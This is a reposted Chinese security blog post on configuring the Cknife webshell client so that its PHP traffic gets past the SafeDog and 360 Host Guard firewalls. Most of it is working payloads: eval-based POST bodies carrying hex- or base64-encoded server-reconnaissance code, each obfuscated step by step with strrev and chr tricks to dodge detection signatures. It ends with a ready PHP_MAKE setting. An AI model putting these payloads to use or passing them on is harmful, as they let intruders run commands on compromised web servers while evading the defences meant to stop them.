Cknife连接过狗_蜗蜗侠's Blog-关注网络安全

Cknife连接过狗

时间:2017-04-18 08:46 来源:转载作者:面具点击:次

Cknife连接过狗-php篇 0x01.使用Cknife:

本文使用Cknife作为分析载体

0x02.Cknife设置功能（参考自github）:

设置：
代理功能：在类型处选择代理类型。支持SOCKS、HTTP类型的代理，使用Burp抓取Cknife数据，需选择代理类型为HTTP，并填上对应的IP以及端口即可。
如果想要关闭代理功能，只需要选择代理类型为DIRECT，或者清空用户名或密码，即表示关闭代理。

自定义请求头功能：在文本框里输入要自定义的请求头以及对应的值，可以添加或修改多个请求头。只需要按照如下格式添加即可：
User-Agent:xxx
Cookie:xxx
ms509:Chora
如果想要关闭自定义请求头功能，只需要把文本框内容清空，或者选中关闭选项并确定。

SPL=->| 表示截取数据的开始符号
SPR=|<- 表示截取数据的结束符号
CODE=code 编码参数
ACTION=action 动作参数
PARAM1=z1 参数1
PARAM2=z2 参数2

PHP_BASE64=1 当为PHP时，Z1，Z2参数是否开启自动base64加密，如果想定义自己的加密方式则关闭设置为0
PHP_MAKE=@eval(base64_decode($_POST[action])); 生成方式，这里可以不用该方式，可以用你任何想要的方式
PHP_INDEX=... 显示主页功能的代码放这儿
PHP_READDICT=... 读取主页功能的代码放这儿
PHP_READFILE=... 读取文件功能的代码放这儿
PHP_DELETE=... 删除文件夹以及文件功能的代码放这儿
PHP_RENAME=... 重命名文件夹以及文件功能的代码放这儿
PHP_RETIME=... 修改时间功能的代码放这儿
PHP_NEWDICT=... 新建目录功能的代码放这儿
PHP_UPLOAD=... 上传文件功能的代码放这儿
PHP_DOWNLOAD=... 下载文件功能的代码放这儿
PHP_SHELL=... 虚拟终端功能的代码放这儿
PHP_DB_MYSQL=... 管理MYSQL数据库功能的代码放这儿

0x03分析（以列目录为例）

看一下原始数据包

a=@eval(base64_decode($_POST[action]));&action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D

换个编码方式试试：

a=@eval(hex2bin($_POST[action]));&action=40696e695f7365742822646973706c61795f6572726f7273222c223022293b407365745f74696d655f6c696d69742830293b407365745f6d616769635f71756f7465735f72756e74696d652830293b6563686f28222d3e7c22293b3b24443d6469726e616d6528245f5345525645525b225343524950545f46494c454e414d45225d293b69662824443d3d22222924443d6469726e616d6528245f5345525645525b22504154485f5452414e534c41544544225d293b24523d227b24447d5c74223b6966287375627374722824442c302c3129213d222f22297b666f72656163682872616e6765282241222c225a222920617320244c2969662869735f64697228227b244c7d3a22292924522e3d227b244c7d3a223b7d24522e3d225c74223b24753d2866756e6374696f6e5f6578697374732827706f7369785f676574656769642729293f40706f7369785f67657470777569642840706f7369785f676574657569642829293a27273b247573723d282475293f24755b276e616d65275d3a406765745f63757272656e745f7573657228293b24522e3d7068705f756e616d6528293b24522e3d22287b247573727d29223b7072696e742024523b3b6563686f28227c3c2d22293b64696528293b

可以看到成功绕过。
不过感觉不太好，木马特征还是太过明显，继续搞

为了方便处理hex2bin和$_REQUEST先把他替换出来
$xxx=hex2bin;$xxxx=$_REQUEST;
在这里$xxx为字符串，在后面运行时转化为了函数
$xxxx为数组，数组内容为接收到的所有参数

a=$xxx=hex2bin;$xxxx=$_REQUEST;@eval($xxx($xxxx[action]));&action=40696e695f7365742822646973706c61795f6572726f7273222c223022293b407365745f74696d655f6c696d69742830293b407365745f6d616769635f71756f7465735f72756e74696d652830293b6563686f28222d3e7c22293b3b24443d6469726e616d6528245f5345525645525b225343524950545f46494c454e414d45225d293b69662824443d3d22222924443d6469726e616d6528245f5345525645525b22504154485f5452414e534c41544544225d293b24523d227b24447d5c74223b6966287375627374722824442c302c3129213d222f22297b666f72656163682872616e6765282241222c225a222920617320244c2969662869735f64697228227b244c7d3a22292924522e3d227b244c7d3a223b7d24522e3d225c74223b24753d2866756e6374696f6e5f6578697374732827706f7369785f676574656769642729293f40706f7369785f67657470777569642840706f7369785f676574657569642829293a27273b247573723d282475293f24755b276e616d65275d3a406765745f63757272656e745f7573657228293b24522e3d7068705f756e616d6528293b24522e3d22287b247573727d29223b7072696e742024523b3b6563686f28227c3c2d22293b64696528293b

用chr函数去除hex2bin：

a=$xxx=chr(104).chr(101).chr(120).chr(50).chr(98).chr(105).chr(110);$xxxx=$_REQUEST;@eval($xxx($xxxx[action]));&action=40696e695f7365742822646973706c61795f6572726f7273222c223022293b407365745f74696d655f6c696d69742830293b407365745f6d616769635f71756f7465735f72756e74696d652830293b6563686f28222d3e7c22293b3b24443d6469726e616d6528245f5345525645525b225343524950545f46494c454e414d45225d293b69662824443d3d22222924443d6469726e616d6528245f5345525645525b22504154485f5452414e534c41544544225d293b24523d227b24447d5c74223b6966287375627374722824442c302c3129213d222f22297b666f72656163682872616e6765282241222c225a222920617320244c2969662869735f64697228227b244c7d3a22292924522e3d227b244c7d3a223b7d24522e3d225c74223b24753d2866756e6374696f6e5f6578697374732827706f7369785f676574656769642729293f40706f7369785f67657470777569642840706f7369785f676574657569642829293a27273b247573723d282475293f24755b276e616d65275d3a406765745f63757272656e745f7573657228293b24522e3d7068705f756e616d6528293b24522e3d22287b247573727d29223b7072696e742024523b3b6563686f28227c3c2d22293b64696528293b

发现被360主机卫士拦截（服务器除了装安全狗外还装了360主机卫士）
post体 chr() 不拦截
post体 chr(1) 拦截
post体 chr(a) 拦截
header xx:chr(1) 不拦截
说明360主机卫士拦截post体中的chr函数，认定方式为包含chr(.+)形式

不让我用chr函数？

a=$ccc=strrev(rhc);$xxx=$ccc(104).$ccc(101).$ccc(120).$ccc(50).$ccc(98).$ccc(105).$ccc(110);$xxxx=$_REQUEST;@eval($xxx($xxxx[action]));&action=40696e695f7365742822646973706c61795f6572726f7273222c223022293b407365745f74696d655f6c696d69742830293b407365745f6d616769635f71756f7465735f72756e74696d652830293b6563686f28222d3e7c22293b3b24443d6469726e616d6528245f5345525645525b225343524950545f46494c454e414d45225d293b69662824443d3d22222924443d6469726e616d6528245f5345525645525b22504154485f5452414e534c41544544225d293b24523d227b24447d5c74223b6966287375627374722824442c302c3129213d222f22297b666f72656163682872616e6765282241222c225a222920617320244c2969662869735f64697228227b244c7d3a22292924522e3d227b244c7d3a223b7d24522e3d225c74223b24753d2866756e6374696f6e5f6578697374732827706f7369785f676574656769642729293f40706f7369785f67657470777569642840706f7369785f676574657569642829293a27273b247573723d282475293f24755b276e616d65275d3a406765745f63757272656e745f7573657228293b24522e3d7068705f756e616d6528293b24522e3d22287b247573727d29223b7072696e742024523b3b6563686f28227c3c2d22293b64696528293b

还有$_POST[action]看着不舒服，想办法去除。
字符串字号处理，那就把它用字符串表示出来然后用eval函数执行它：

a=$ccc=strrev(rhc);$xxx=$ccc(104).$ccc(101).$ccc(120).$ccc(50).$ccc(98).$ccc(105).$ccc(110);$str="\$cccc=\$_P"."OST[action];";$xxxx=@eval($str);@eval($xxx($cccc));&action=40696e695f7365742822646973706c61795f6572726f7273222c223022293b407365745f74696d655f6c696d69742830293b407365745f6d616769635f71756f7465735f72756e74696d652830293b6563686f28222d3e7c22293b3b24443d6469726e616d6528245f5345525645525b225343524950545f46494c454e414d45225d293b69662824443d3d22222924443d6469726e616d6528245f5345525645525b22504154485f5452414e534c41544544225d293b24523d227b24447d5c74223b6966287375627374722824442c302c3129213d222f22297b666f72656163682872616e6765282241222c225a222920617320244c2969662869735f64697228227b244c7d3a22292924522e3d227b244c7d3a223b7d24522e3d225c74223b24753d2866756e6374696f6e5f6578697374732827706f7369785f676574656769642729293f40706f7369785f67657470777569642840706f7369785f676574657569642829293a27273b247573723d282475293f24755b276e616d65275d3a406765745f63757272656e745f7573657228293b24522e3d7068705f756e616d6528293b24522e3d22287b247573727d29223b7072696e742024523b3b6563686f28227c3c2d22293b64696528293b

成功
再处理一下$_POST[]:

a=$ccc=strrev(rhc);$xxx=$ccc(104).$ccc(101).$ccc(120).$ccc(50).$ccc(98).$ccc(105).$ccc(110);$str="\$cccc=".$ccc(36).$ccc(95).$ccc(80)."OST".$ccc(91)."action".$ccc(93).";";$xxxx=@eval($str);@eval($xxx($cccc));&action=40696e695f7365742822646973706c61795f6572726f7273222c223022293b407365745f74696d655f6c696d69742830293b407365745f6d616769635f71756f7465735f72756e74696d652830293b6563686f28222d3e7c22293b3b24443d6469726e616d6528245f5345525645525b225343524950545f46494c454e414d45225d293b69662824443d3d22222924443d6469726e616d6528245f5345525645525b22504154485f5452414e534c41544544225d293b24523d227b24447d5c74223b6966287375627374722824442c302c3129213d222f22297b666f72656163682872616e6765282241222c225a222920617320244c2969662869735f64697228227b244c7d3a22292924522e3d227b244c7d3a223b7d24522e3d225c74223b24753d2866756e6374696f6e5f6578697374732827706f7369785f676574656769642729293f40706f7369785f67657470777569642840706f7369785f676574657569642829293a27273b247573723d282475293f24755b276e616d65275d3a406765745f63757272656e745f7573657228293b24522e3d7068705f756e616d6528293b24522e3d22287b247573727d29223b7072696e742024523b3b6563686f28227c3c2d22293b64696528293b

设置一下

PHP_MAKE=$ccc=strrev(rhc);$xxx=$ccc(104).$ccc(101).$ccc(120).$ccc(50).$ccc(98).$ccc(105).$ccc(110);$str="\\$cccc=".$ccc(36).$ccc(95).$ccc(80)."OST".$ccc(91)."action".$ccc(93).";";$xxxx=@eval($str);@eval($xxx($cccc));

PHP_INDEX=40696e695f7365742822646973706c61795f6572726f7273222c223022293b407365745f74696d655f6c696d69742830293b407365745f6d616769635f71756f7465735f72756e74696d652830293b6563686f28222d3e7c22293b3b24443d6469726e616d6528245f5345525645525b225343524950545f46494c454e414d45225d293b69662824443d3d22222924443d6469726e616d6528245f5345525645525b22504154485f5452414e534c41544544225d293b24523d227b24447d5c74223b6966287375627374722824442c302c3129213d222f22297b666f72656163682872616e6765282241222c225a222920617320244c2969662869735f64697228227b244c7d3a22292924522e3d227b244c7d3a223b7d24522e3d225c74223b24753d2866756e6374696f6e5f6578697374732827706f7369785f676574656769642729293f40706f7369785f67657470777569642840706f7369785f676574657569642829293a27273b247573723d282475293f24755b276e616d65275d3a406765745f63757272656e745f7573657228293b24522e3d7068705f756e616d6528293b24522e3d22287b247573727d29223b7072696e742024523b3b6563686f28227c3c2d22293b64696528293b

注意\前面要加转义字符\
列路径成功：

Cknife连接过狗

由于改变了编码导致所有功能payload都需要改变，所以改回base64编码

0x04改回base64编码

在菜刀自带配置文件基础上只需要改一下PHP_MAKE就可以了（在原配置文件上改）

PHP_MAKE=$ccc=strrev(rhc);$xxx="bas".$ccc(101).$ccc(54).$ccc(52).$ccc(95).$ccc(100)."ecode";$str="\\$cccc=".$ccc(36).$ccc(95).$ccc(80)."OST".$ccc(91)."action".$ccc(93).";";$xxxx=@eval($str);@eval($xxx($cccc));

0x05 其他

未具体分析拦截哪些内容，
只粗略看了下拦截@eval(base64_decode($_POST[action]))

其他脚本语言的有空继续写，继续发转面具老表

(责任编辑：蜗蜗侠)